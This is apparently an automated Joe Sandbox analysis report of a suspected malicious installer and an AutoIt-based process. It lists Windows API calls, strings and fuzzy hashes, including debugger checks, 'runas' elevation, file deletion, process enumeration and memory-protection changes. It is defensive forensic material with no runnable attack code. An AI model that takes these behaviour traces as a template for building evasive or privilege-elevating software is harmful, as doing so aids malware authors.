Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: PrivateProfileStringlstrcmp
String ID: !N~
API String ID: 623250636-529124213
Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718

Function 00405C3F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
CloseHandle.KERNEL32(?), ref: 00405C71

Strings

Error launching installer, xrefs: 00405C48

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68

Function 004062A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 004062A5, 004062AA

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: CloseHandlelstrlenwvsprintf
String ID: RMDir: RemoveDirectory invalid input("")
API String ID: 3509786178-2769509956
Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E

Function 00405DB6 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

Analysis Process: Luther.comPID: 7696, Parent PID: 7440COMMON

Execution Graph

Execution Coverage:	3.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.7%
Total number of Nodes:	2000
Total number of Limit Nodes:	67

Executed Functions

Function 00E35FC8 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 236
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00E35FF7

Part of subcall function 00E38577: _wcslen.LIBCMT ref: 00E3858A

GetCurrentProcess.KERNEL32(?,00ECDC2C,00000000,?,?), ref: 00E36123
IsWow64Process.KERNEL32(00000000,?,?), ref: 00E3612A
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00E36155
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00E36167
GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00E36175
FreeLibrary.KERNEL32(00000000,?,?), ref: 00E3617C
GetSystemInfo.KERNEL32(?,?,?), ref: 00E361A1

Strings

GetNativeSystemInfo, xrefs: 00E36161
|O, xrefs: 00E750F7
kernel32.dll, xrefs: 00E36150

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: f4311353e5dc4f0344190cb072308751457425fc42f2b5f27b655927212c7bfe
Instruction ID: 7310752dfa1fa83c00465ad4b8a16bd3b5b09d3a8f8ba0e42fe1aff0f74b91ec
Opcode Fuzzy Hash: f4311353e5dc4f0344190cb072308751457425fc42f2b5f27b655927212c7bfe
Instruction Fuzzy Hash: 24A1B82280A7CCDFC756C7BC7C4D5D57FA47B26304F58A899D484B7222C66D4948EB31

Function 00E3338B Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 148
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00E33368,?), ref: 00E333BB
IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00E33368,?), ref: 00E333CE
GetFullPathNameW.KERNEL32(00007FFF,?,?,00F02418,00F02400,?,?,?,?,?,?,00E33368,?), ref: 00E3343A

Part of subcall function 00E38577: _wcslen.LIBCMT ref: 00E3858A

Part of subcall function 00E3425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00E33462,00F02418,?,?,?,?,?,?,?,00E33368,?), ref: 00E342A0

SetCurrentDirectoryW.KERNEL32(?,00000001,00F02418,?,?,?,?,?,?,?,00E33368,?), ref: 00E334BB
MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00E73CB0
SetCurrentDirectoryW.KERNEL32(?,00F02418,?,?,?,?,?,?,?,00E33368,?), ref: 00E73CF1
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00EF31F4,00F02418,?,?,?,?,?,?,?,00E33368), ref: 00E73D7A
ShellExecuteW.SHELL32(00000000,?,?), ref: 00E73D81

Part of subcall function 00E334D3: GetSysColorBrush.USER32(0000000F), ref: 00E334DE
Part of subcall function 00E334D3: LoadCursorW.USER32(00000000,00007F00), ref: 00E334ED
Part of subcall function 00E334D3: LoadIconW.USER32(00000063), ref: 00E33503
Part of subcall function 00E334D3: LoadIconW.USER32(000000A4), ref: 00E33515
Part of subcall function 00E334D3: LoadIconW.USER32(000000A2), ref: 00E33527
Part of subcall function 00E334D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E3353F
Part of subcall function 00E334D3: RegisterClassExW.USER32(?), ref: 00E33590

Part of subcall function 00E335B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E335E1
Part of subcall function 00E335B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E33602
Part of subcall function 00E335B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00E33368,?), ref: 00E33616
Part of subcall function 00E335B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00E33368,?), ref: 00E3361F

Part of subcall function 00E3396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E33A3C

Strings

runas, xrefs: 00E73D75
AutoIt, xrefs: 00E73CA5
It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00E73CAA

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
API String ID: 683915450-2030392706
Opcode ID: 82776e88fcc448d8984c167d580c1cc3f84d6ec6ab25f07062e360a1e4a19cdd
Instruction ID: 7c8e790d9791a825845fdcc1567af540b2c92ed85f0829401bf3f84ad1561501
Opcode Fuzzy Hash: 82776e88fcc448d8984c167d580c1cc3f84d6ec6ab25f07062e360a1e4a19cdd
Instruction Fuzzy Hash: B451F770208345AEC711EF709C4DDAEBFE8AF84744F00242DF591761A3DB328A49E722

Function 00E9DC54 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E35851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E355D1,?,?,00E74B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00E35871

Part of subcall function 00E9EAB0: GetFileAttributesW.KERNEL32(?,00E9D840), ref: 00E9EAB1

FindFirstFileW.KERNEL32(?,?), ref: 00E9DCCB
DeleteFileW.KERNEL32(?,?,?,?), ref: 00E9DD1B
FindNextFileW.KERNELBASE(00000000,00000010), ref: 00E9DD2C
FindClose.KERNEL32(00000000), ref: 00E9DD43
FindClose.KERNEL32(00000000), ref: 00E9DD4C

Strings

\*.*, xrefs: 00E9DC9D

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 897b503413c8d01dbe75e299192a2f16fd0fade15753c58301aed723dff5fc08
Instruction ID: c93b8cee3edd4d6ac811551794562be5e95e22a9034360673ecdd2436f23bfb2
Opcode Fuzzy Hash: 897b503413c8d01dbe75e299192a2f16fd0fade15753c58301aed723dff5fc08
Instruction Fuzzy Hash: 1931723100C355AFC705EB64CC458AFBBE8AE95304F406E6DF5D6A2191DB22DA09CB53

Function 00E9DD87 Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00E9DDAC
Process32FirstW.KERNEL32(00000000,?), ref: 00E9DDBA
Process32NextW.KERNEL32(00000000,?), ref: 00E9DDDA
CloseHandle.KERNEL32(00000000), ref: 00E9DE87

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 77e9e3b6e9438c9604af45701c6aac05ae35fc9cb0002a029240d8227e07f1a1
Instruction ID: d6a8c90d0db24dd98f172138ab9ffa66d3d61cb2843473f5d3b7cd6ec4b5035e
Opcode Fuzzy Hash: 77e9e3b6e9438c9604af45701c6aac05ae35fc9cb0002a029240d8227e07f1a1
Instruction Fuzzy Hash: 2431B4711083009FD710EF60CC85EAFBFE8AF99354F44192DF582A71A1DB729949CB92

Function 00E4FFE0 Relevance: 3.1, APIs: 2, Instructions: 94nativeCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00E5007D
NtProtectVirtualMemory.NTDLL ref: 00E5008F

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: CloseHandleMemoryProtectVirtual
String ID:
API String ID: 2407445808-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 3bcfda58e3f1ebb3bef1dfbc599e0dbfa6c4e0f3d68e337e2eb84430d3a69106
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 7431D770A00106DFCB18CF58D590A69F7A5FF49305B649EA5E809DB292D732EDC5CBC0

Function 00E4AC3E Relevance: 23.4, APIs: 1, Strings: 12, Instructions: 671
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d1r0,2, xrefs: 00E4ACA9
@, xrefs: 00E4ADED
P, xrefs: 00E4AD3D
d1b, xrefs: 00E4AD55, 00E4AE8E
4, xrefs: 00E4AD45
d0b, xrefs: 00E4AC96, 00E4AD10, 00E4AEA7
d5m0, xrefs: 00E4AE75
i, xrefs: 00E4B0A3
d10m0, xrefs: 00E4ACF0
t, xrefs: 00E4ADCC
t, xrefs: 00E4AD35
`, xrefs: 00E4ADE2

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID:
String ID: 4$@$P$`$d0b$d10m0$d1b$d1r0,2$d5m0$i$t$t
API String ID: 0-3986754044
Opcode ID: 9561f42811cedb442abb674a6841df9063f6730afd2ef6a9c1d8e6a671551097
Instruction ID: 959fc7d557a66c811cd9d79961016704cea6fe27702ab449e7cc2978e142a5c0
Opcode Fuzzy Hash: 9561f42811cedb442abb674a6841df9063f6730afd2ef6a9c1d8e6a671551097
Instruction Fuzzy Hash: BF624770508341CFC328DF24C595AAABBE1BF88308F50996EE89DAB351DB71D945CF92

Function 00E3EE50 Relevance: 21.6, APIs: 14, Instructions: 612timeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 00E3EF07
timeGetTime.WINMM ref: 00E3F107

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: InputStateTimetime
String ID:
API String ID: 2164325655-0
Opcode ID: 8cf6f559b43305e7c05f44dca1abf8072a447e98d79701cf1c210702d2577a6e
Instruction ID: f5e8c8c4bdd5af56b439bdfbe4968d63f933663f907603ca9d41548147b4c576
Opcode Fuzzy Hash: 8cf6f559b43305e7c05f44dca1abf8072a447e98d79701cf1c210702d2577a6e
Instruction Fuzzy Hash: F332F670A04702DFD728DF24C888BAABBE5FF41308F14652DE559A72A1D771E944CF92

Function 00E33624 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00E33657
RegisterClassExW.USER32(00000030), ref: 00E33681
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E33692
InitCommonControlsEx.COMCTL32(?), ref: 00E336AF
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E336BF
LoadIconW.USER32(000000A9), ref: 00E336D5
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E336E4

Strings

0+m", xrefs: 00E3366C
+, xrefs: 00E33640
TaskbarCreated, xrefs: 00E33687
AutoIt v3 GUI, xrefs: 00E33673
0, xrefs: 00E33639

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$0+m"$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-2301606172
Opcode ID: 96033f22c42891a440b37f40c869736080c59c5499668c7533680c428c2fec5a
Instruction ID: d7b5e6275364deb8a32c336b19602821f0144326dd36fc3a65d971de30ea1759
Opcode Fuzzy Hash: 96033f22c42891a440b37f40c869736080c59c5499668c7533680c428c2fec5a
Instruction Fuzzy Hash: A821E2B1905318AFDB409FA5ED89B9DBBB4FB08710F00512AF611B62A0D7B64545AFA0

Function 00E709DB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E7071A: CreateFileW.KERNEL32(00000000,00000000,?,00E70A84,?,?,00000000,?,00E70A84,00000000,0000000C), ref: 00E70737

GetLastError.KERNEL32 ref: 00E70AEF
__dosmaperr.LIBCMT ref: 00E70AF6
GetFileType.KERNEL32(00000000), ref: 00E70B02
GetLastError.KERNEL32 ref: 00E70B0C
__dosmaperr.LIBCMT ref: 00E70B15
CloseHandle.KERNEL32(00000000), ref: 00E70B35
CloseHandle.KERNEL32(?), ref: 00E70C7F
GetLastError.KERNEL32 ref: 00E70CB1
__dosmaperr.LIBCMT ref: 00E70CB8

Strings

H, xrefs: 00E70C3D

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: ab1c8d477fa5d39e85f85491beff57a5c446b1b7d4c517d5171c29d15d8a226a
Instruction ID: 3482948c7a9764df59e5adc8004f1b4db3bf5b3f33de5b6774690fb79f06cd9a
Opcode Fuzzy Hash: ab1c8d477fa5d39e85f85491beff57a5c446b1b7d4c517d5171c29d15d8a226a
Instruction Fuzzy Hash: 73A14332A042498FCF19AF68D892BAE7BE1EB06324F145159F815FB2D1DB319D02CB91

Function 00E352A7 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E35594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00E74B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00E355B2

Part of subcall function 00E35238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00E3525A

RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00E353C4
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00E74BFD
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00E74C3E
RegCloseKey.ADVAPI32(?), ref: 00E74C80
_wcslen.LIBCMT ref: 00E74CE7
_wcslen.LIBCMT ref: 00E74CF6

Strings

Software\AutoIt v3\AutoIt, xrefs: 00E353BA
\, xrefs: 00E74CFC
Include, xrefs: 00E74BF4, 00E74C35
\Include\, xrefs: 00E35381

Memory Dump Source

Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true

Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_e30000_Luther.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: 1feff22b482e5bd9e3b891d7dcf944646ef2a7260ae4862367cdcd9e3aa823b8
Instruction ID: 41781a2a6fba8281f2f26851c5d5426202cafc6cf6f7d5fcec2e855bdd7c4af0
Opcode Fuzzy Hash: 1feff22b482e5bd9e3b891d7dcf944646ef2a7260ae4862367cdcd9e3aa823b8
Instruction Fuzzy Hash: 99719F71105305AEC304EF69EC8599BBBECFF88340F80682EF545A71A1DB729A49DB52

Function 00E334D3 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00E334DE
LoadCursorW.USER32(00000000,00007F00), ref: 00E334ED
LoadIconW.USER32(00000063), ref: 00E33503
LoadIconW.USER32(000000A4), ref: 00E33515
LoadIconW.USER32(000000A2), ref: 00E33527
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E3353F
RegisterClassExW.USER32(?), ref: 00E33590

Part of subcall function 00E33624: GetSysColorBrush.USER32(0000000F), ref: 00E33657
Part of subcall function 00E33624: RegisterClassExW.USER32(00000030), ref: 00E33681
Part of subcall function 00E33624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E33692
Part of subcall function 00E33624: InitCommonControlsEx.COMCTL32(?), ref: 00E336AF
Part of subcall function 00E33624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E336BF
Part of subcall function 00E33624: LoadIconW.USER32(000000A9), ref: 00E336D5
